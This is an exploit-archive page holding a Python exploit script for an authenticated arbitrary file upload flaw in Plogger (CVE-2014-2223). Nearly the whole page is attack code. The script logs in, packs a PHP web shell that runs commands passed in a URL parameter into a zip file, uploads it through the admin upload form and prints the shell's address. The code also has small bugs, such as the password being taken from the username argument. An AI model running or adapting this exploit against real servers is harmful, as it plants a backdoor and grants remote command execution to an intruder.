Home / os / blackberry

Plogger Authenticated Arbitrary File Upload

Posted on 29 August 2014

#!/usr/bin/env python # Exploit Title: Plogger Authenticated Arbitrary File Upload # Date: Feb 2014 # Exploit Author: b0z # Vendor Homepage: www.plogger.org # Software Link: www.plogger.org/download # Version: Plogger prior to 1.0-RC1 # CVE : 2014-2223 import hashlib import os import zipfile import requests import time import argparse def login(session,host,username,password): print "[+] Log in" session.post('http://%s/plog-admin/plog-upload.php' % host, data={ "plog_username": username, "plog_password": password, "action": "log_in" }) def upload(session): print "[+] Creating poisoned gift" ## Write the backdoor backdoor = open(magic + '.php', 'w+', buffering = 0) backdoor.write("<?php system($_GET['cmd']) ?>") backdoor.close # Add true image file to block the race condition (mandatory not null) image = open(magic + '.png', 'w+', buffering = 0) image.write('A') image.close gift = zipfile.ZipFile(magic + '.zip', mode = 'w') gift.write(magic + '.php') gift.write(magic + '.png') gift.close os.remove(magic + '.php') os.remove(magic + '.png') gift = open(magic + '.zip', 'rb') files= { "userfile": ("archive.zip", gift)} session.post('http://%s/plog-admin/plog-upload.php' % host, files=files, data = { "destination_radio":"existing", "albums_menu" : "1", "new_album_name":"", "collections_menu":"1", "upload":"Upload" }) os.remove(magic + '.zip') print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic) if __name__== "__main__": parser = argparse.ArgumentParser() parser.add_argument("--host" , help="Remote host",required=True) parser.add_argument("--user" , help="Username",required=True) parser.add_argument("--password" , help="Password",required=True) args = parser.parse_args() host = args.host username = args.user password = args.user magic = hashlib.sha1(time.asctime()).hexdigest() session = requests.session() login(session,host,username,password) upload(session)

 

TOP